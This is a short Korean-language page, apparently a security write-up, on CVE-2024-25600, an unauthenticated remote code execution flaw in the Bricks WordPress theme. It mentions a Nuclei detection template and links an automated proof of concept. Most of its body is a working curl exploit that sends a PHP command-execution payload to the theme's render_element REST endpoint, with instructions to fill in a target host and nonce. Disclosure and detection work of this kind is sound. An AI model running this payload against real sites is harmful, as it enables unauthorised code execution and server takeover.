
Nuclei 템플릿 및 CVE-2024-25600에 대한 PoC 정보
CVE-2024-25600에 대한 Nuclei 템플릿 및 PoC 정보
Bricks 테마(WordPress용)는 버전 1.9.6 이하의 모든 버전에서 원격 코드 실행(Remote Code Execution)에 취약합니다. 이로 인해 인증되지 않은 공격자가 서버에서 코드를 실행할 수 있습니다. 이 템플릿 🛠️은 nuclei를 사용하여 WordPress용 Bricks Builder 플러그인에서 발견된 CVE-2024-25600 취약점 🕳️을 탐지하도록 설계되었습니다. 이 취약점을 통해 영향을 받는 웹사이트 💻에서 인증되지 않은 원격 코드 실행이 가능합니다.
전체 POC (자동)는 https://github.com/chocapikk/CVE-2024-25600에서 확인할 수 있습니다.
공개된 기본 PoC는 다음과 같습니다:
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
"objectType": "post"
}
}
}
}'
[HOST]를 대상 웹사이트로, [NONCE]를 사이트에서 얻은 nonce 값으로 바꾸십시오.
CVE-2024-25600 취약점에 대한 자세한 정보는 Snicco.io의 상세 공개를 참조하십시오.